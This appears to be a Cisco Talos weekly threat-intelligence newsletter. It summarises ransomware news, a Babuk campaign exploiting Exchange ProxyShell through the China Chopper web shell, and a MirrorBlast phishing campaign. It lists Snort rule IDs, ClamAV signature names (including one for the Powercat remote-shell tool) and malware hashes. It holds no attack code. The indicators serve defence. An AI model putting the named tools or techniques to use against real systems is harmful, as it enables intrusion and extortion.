Good afternoon, Talos readers.

A series of vulnerabilities in Microsoft Exchange Server made waves earlier this year for coming under attack. And while they've come and gone from the headlines since then, attackers are still very much paying attention.

Attackers spreading the Babuk ransomware are targeting these vulnerabilities to infect victims. Find out how, exactly, these Babuk attacks work, and if you haven't already, patch.

To prepare for a ransomware attack like this, it's always important to have an incident response plan at the ready. Whether you are looking to create an IR plan from scratch, or just looking to polish your current one, we have a new guide to get you started.

Cybersecurity week in review

  • At least one member of the BlackMatter ransomware gang started using a custom data exfiltration toolkit to steal specific file types and upload them to an attacker-controlled server. Security researchers have found multiple variants of the tool, suggesting the attackers have refined the tool to expedite the exfiltration of high volumes of data.
  • Google's new Pixel 6 phone contains several new security features highlighted by an in-house system-on-chip that runs the devices. The company has also promised to provide security updates to the Pixel 6 for at least five years.
  • A since-patched bug in the health app Docket exposed the vaccination status and other information of users in New Jersey and Utah. The app is officially endorsed in those states as a way to present the user's proof of vaccination.
  • Europol arrested several people involved with the LockerGoga ransomware and took down the malware's operations. It's estimated that LockerGoga infected more than 1,800 victims across 71 countries.
  • Ransomware attacks have already hit nearly 1,000 schools in the U.S. this year. The number of attacks targeting school systems rose in 2019, and since then, the pace has only accelerated.
  • The U.S. Cybersecurity and Infrastructure Security Agency has started mapping and labeling all critical infrastructure in the U.S. that, if hit with a cyber attack, could disrupt everyday life. The hope is that, by accounting for all CI, it will make it easier to pass and implement legislation in the future to secure these services.
  • Jen Easterly, the head of CISA, added during testimony to Congress that her agency is also developing a list of known exploited vulnerabilities, and will require federal agencies to patch them. While the directive will only apply to the federal public sector, she encouraged all organizations to closely follow the list.
  • Iran is publicly blaming the U.S. and Israel for cyber attacks that disrupted gasoline sales in the country for days. The outage led to higher gas prices and forced gas stations to operate manually.
  • The Grief ransomware group hit the National Rifle Association last week. But this is a particularly tough situation for the gun rights advocacy group, as Grief is under sanction from the U.S. government, meaning they could be punished if they choose to pay the extortion payment.

Notable recent security issues

Microsoft Exchange vulnerabilities exploited once again for ransomware, this time with Babuk

Cisco Talos recently discovered a malicious campaign deploying variants of the Babuk ransomware predominantly affecting users in the U.S. with a smaller number of infections in the U.K., Germany, Ukraine, Finland, Brazil, Honduras and Thailand. The actor of the campaign is sometimes referred to as Tortilla, based on the payload file names used in the campaign. This is a new actor operating since July 2021. Prior to this ransomware, Tortilla has been experimenting with other payloads, such as the PowerShell-based Netcat clone Powercat, which is known to provide attackers with unauthorized access to Windows machines. We assess with moderate confidence that the initial infection vector is the exploitation of ProxyShell vulnerabilities in Microsoft Exchange Server through the deployment of China Chopper web shell.

Snort SIDs: 57873, 57874

ClamAV signatures:

  • Win.Ransomware.Packer-7473772-1
  • Win.Trojan.Swrort-5710536-0
  • Win.Trojan.Powercat-9840812-0
  • Win.Trojan.Swrort-9902494-0
  • Win.Exploit.PetitPotam-9902441-0
  • Win.Trojan.MSILAgent-9904224-0
  • Win.Malware.Agent-9904986-0
  • Win.Malware.Agent-9904987-0
  • Win.Malware.Agent-9904988-0
  • Win.Malware.Agent-9904989-0
  • Win.Malware.Agent-9904990-0
  • Win.Downloader.DarkTortilla-9904993-0
  • Win.Trojan.DarkTortilla-9904994-0
  • MirrorBlast phishing campaign uses Excel spreadsheet to evade detection

    A phishing campaign that recently hit the malware landscape uses a specially crafted Excel file to put malicious URLs and files in front of victims and evade detection. The spreadsheets use social engineering tactics to convince users to enable macros on in their Microsoft Office suite. The infection vector also involves Google Drive and SharePoint links that point to the Excel file. Others are attached directly to emails. The spam emails are commonly centered around COVID-19 news, one of the most popular topics spammers have used over the past two years.

    Snort SID: 58430 - 58433

    Most prevalent malware files this week

    SHA 256: 5bab2ae1cada90f37b821e4803912c5b351fda417bbf0a9c768b715c6d492e13

    MD5: a6a7eb61172f8d988e47322ebf27bf6d

    Typical Filename: wx.exe

    Claimed Product: N/A

    Detection Name: Win.Dropper.Wingo::in07.talos

    SHA 256: e5044d5ac2f8ea3090c2460a5f7d92a5a49e7fa040bf26659ec2f7c442dda762

    MD5: 6ea750c9d69b7db6532d90ac0960e212


    Typical Filename:

    Claimed Product: N/A

    Detection Name: Auto.E5044D5AC2.242358.in07.Talos

    SHA 256: 8b4216a7c50599b11241876ada8ae6f07b48f1abe6590c2440004ea4db5becc9

    MD5: 34560233e751b7e95f155b6f61e7419a

    Typical Filename: SAntivirusService.exe

    Claimed Product: A n t i v i r u s S e r v i c e

    Detection Name: PUA.Win.Dropper.Segurazo::tpd

    SHA 256: 7b4da67a0eea0dce93c7d89c565319fe2645114ca0ff679948ad2a55819c79b4

    MD5: 990d51d0c45519da4d995f7c264733e5

    Typical Filename: SAntivirusService.exe

    Claimed Product: SAService

    Detection Name:

    SHA 256: fc8d064e05ebe37d661aeccb78f91085845e9e28ccff1f9b08fd373830e38b7f

    MD5: e0a50c60a85bfbb9ecf45bff0239aaa3

    Typical Filename: gMpKaUjCkJ

    Claimed Product: N/A

    Detection Name: WinGoRanumBot::mURLin::W32.Auto:fc8d064e05.in03.Talos

    Keep up with all things Talos by following us on Twitter. Snort, and ClamAV also have their own accounts you can follow to keep up with their latest updates. You can also subscribe to the Beers with Talos podcast here and Talos Takes here (as well as on your favorite podcast app). And, if you’re not already, you can also subscribe to the weekly Threat Source newsletter here.